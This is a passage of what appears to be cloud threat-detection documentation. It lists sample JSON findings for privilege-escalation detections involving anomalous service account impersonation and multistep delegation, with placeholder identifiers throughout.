"organizations/ORGANIZATION_ID/folders/FOLDER_NUMBER/projects/PROJECT_NUMBER" } }
Privilege Escalation: Anomalous Impersonation of Service Account for Admin Activity
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "storage.googleapis.com", "methodName": "storage.buckets.list", "serviceAccountDelegationInfo": [ { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" } ] }, "assetDisplayName": "PROJECT_ID", "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Anomalous Impersonation of Service Account for Admin Activity", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-02-09T03:26:04.611Z", "database": {}, "eventTime": "2023-02-09T03:26:05.403Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "MEDIUM", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "ORGANIZATION", "type": "google.cloud.resourcemanager.Project", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "anomalous_sa_delegation_impersonation_of_sa_admin_activity" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//storage.googleapis.com/" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1675913160", "nanos": 929341814 }, "insertId": "o5ii7hddddd" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/" } } } }
Privilege Escalation: Anomalous Impersonation of Service Account for AI Admin Activity
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "aiplatform.googleapis.com", "methodName": "METHOD_NAME", "serviceAccountDelegationInfo": [ { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" } ] }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Anomalous Impersonation of Service Account for AI Admin Activity", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-02-09T03:26:04.611Z", "database": {}, "eventTime": "2023-02-09T03:26:05.403Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "VALID_ACCOUNTS" ] }, "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "domains": [ { "category": "AI" }, { "category": "IDENTITY_AND_ACCESS" } ], "aiModel": { "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "deploymentPlatform": "VERTEX_AI" }, "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "organization": "organizations/ORGANIZATION_ID" }, "type": "google.aiplatform.Model", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "ai_anomalous_sa_delegation_impersonation_of_sa_admin_activity" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1675913160", "nanos": 929341814 }, "insertId": "o5ii7hddddd" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/" } } } }
Privilege Escalation: Anomalous Multistep Service Account Delegation for Admin Activity
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "storage.googleapis.com", "methodName": "storage.buckets.list", "serviceAccountDelegationInfo": [ { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" } ] }, "assetDisplayName": "PROJECT_ID", "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Anomalous Multistep Service Account Delegation for Admin Activity", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-02-09T03:26:04.611Z", "database": {}, "eventTime": "2023-02-09T03:26:05.403Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "MEDIUM", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "ORGANIZATION", "type": "google.cloud.resourcemanager.Project", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "anomalous_sa_delegation_multistep_admin_activity" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//storage.googleapis.com/" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1675913160", "nanos": 929341814 }, "insertId": "o5ii7hddddd" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/" } } } }
Privilege Escalation: Anomalous Multistep Service Account Delegation for AI Admin Activity
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "aiplatform.googleapis.com", "methodName": "METHOD_NAME", "serviceAccountDelegationInfo": [ { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" } ] }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Anomalous Multistep Service Account Delegation for AI Admin Activity", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-02-09T03:26:04.611Z", "database": {}, "eventTime": "2023-02-09T03:26:05.403Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS" ] }, "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "domains": [ { "category": "AI" }, { "category": "IDENTITY_AND_ACCESS" } ], "aiModel": { "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "deploymentPlatform": "VERTEX_AI" }, "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "severity": "MEDIUM", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "organization": "organizations/ORGANIZATION_ID" }, "type": "google.aiplatform.Model", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "ai_anomalous_sa_delegation_multistep_admin_activity" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1675913160", "nanos": 929341814 }, "insertId": "o5ii7hddddd" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://atlas.mitre.org/techniques/AML.T0012/" } } } }
Privilege Escalation: Anomalous Multistep Service Account Delegation for AI Data Access
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "aiplatform.googleapis.com", "methodName": "METHOD_NAME", "serviceAccountDelegationInfo": [ { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" } ] }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Anomalous Multistep Service Account Delegation for AI Data Access", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-02-09T03:26:04.611Z", "database": {}, "eventTime": "2023-02-09T03:26:05.403Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS" ] }, "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "domains": [ { "category": "AI" }, { "category": "IDENTITY_AND_ACCESS" } ], "aiModel": { "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "deploymentPlatform": "VERTEX_AI" }, "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "organization": "organizations/ORGANIZATION_ID" }, "type": "google.aiplatform.Model", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "ai_anomalous_sa_delegation_multistep_data_access" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1675913160", "nanos": 929341814 }, "insertId": "o5ii7hddddd" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://atlas.mitre.org/techniques/AML.T0012/" } } } }
Privilege Escalation: Anomalous Multistep Service Account Delegation for Data Access
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "storage.googleapis.com", "methodName": "storage.buckets.list", "serviceAccountDelegationInfo": [ { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" } ] }, "assetDisplayName": "PROJECT_ID", "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Anomalous Multistep Service Account Delegation for Data Access", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-02-09T03:26:04.611Z", "database": {}, "eventTime": "2023-02-09T03:26:05.403Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "MEDIUM", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "ORGANIZATION", "type": "google.cloud.resourcemanager.Project", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "anomalous_sa_delegation_multistep_data_access" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//storage.googleapis.com/" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1675913160", "nanos": 929341814 }, "insertId": "o5ii7hddddd" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/" } } } }
Privilege Escalation: Anomalous Service Account Impersonator for Admin Activity
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "storage.googleapis.com", "methodName": "storage.buckets.list", "serviceAccountDelegationInfo": [ { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" } ] }, "assetDisplayName": "PROJECT_ID", "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Anomalous Service Account Impersonator for Admin Activity", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-02-09T03:26:04.611Z", "database": {}, "eventTime": "2023-02-09T03:26:05.403Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "MEDIUM", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "ORGANIZATION", "type": "google.cloud.resourcemanager.Project", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "anomalous_sa_delegation_impersonator_admin_activity" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//storage.googleapis.com/" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1675913160", "nanos": 929341814 }, "insertId": "o5ii7hddddd" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/" } } } }
Privilege Escalation: Anomalous Service Account Impersonator for AI Admin Activity
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "aiplatform.googleapis.com", "methodName": "METHOD_NAME", "serviceAccountDelegationInfo": [ { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" } ] }, "assetDisplayName": "PROJECT_ID", "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Anomalous Service Account Impersonator for AI Admin Activity", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-02-09T03:26:04.611Z", "database": {}, "eventTime": "2023-02-09T03:26:05.403Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS" ] }, "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "domains": [ { "category": "AI" }, { "category": "IDENTITY_AND_ACCESS" } ], "aiModel": { "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "deploymentPlatform": "VERTEX_AI" }, "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "organization": "organizations/ORGANIZATION_ID" }, "type": "google.aiplatform.Model", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "ai_anomalous_sa_delegation_impersonator_admin_activity" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1675913160", "nanos": 929341814 }, "insertId": "o5ii7hddddd" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://atlas.mitre.org/techniques/AML.T0012/" } } } }
Privilege Escalation: Anomalous Service Account Impersonator for AI Data Access
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "aiplatform.googleapis.com", "methodName": "METHOD_NAME", "serviceAccountDelegationInfo": [ { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" } ] }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Anomalous Service Account Impersonator for AI Data Access", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-02-09T03:26:04.611Z", "database": {}, "eventTime": "2023-02-09T03:26:05.403Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS" ] }, "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "domains": [ { "category": "AI" }, { "category": "IDENTITY_AND_ACCESS" } ], "aiModel": { "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "deploymentPlatform": "VERTEX_AI" }, "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "organization": "organizations/ORGANIZATION_ID" }, "type": "google.aiplatform.Model", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "ai_anomalous_sa_delegation_impersonator_data_access" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1675913160", "nanos": 929341814 }, "insertId": "o5ii7hddddd" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://atlas.mitre.org/techniques/AML.T0012/" } } } }
Privilege Escalation: Anomalous Service Account Impersonator for Data Access
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "storage.googleapis.com", "methodName": "storage.buckets.list", "serviceAccountDelegationInfo": [ { "principalEmail": "PRINCIPAL_EMAIL" }, { "principalEmail": "PRINCIPAL_EMAIL" } ] }, "assetDisplayName": "PROJECT_ID", "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Anomalous Service Account Impersonator for Data Access", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-02-09T03:26:04.611Z", "database": {}, "eventTime": "2023-02-09T03:26:05.403Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "MEDIUM", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "ORGANIZATION", "type": "google.cloud.resourcemanager.Project", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "anomalous_sa_delegation_impersonator_data_access" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//storage.googleapis.com/" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": 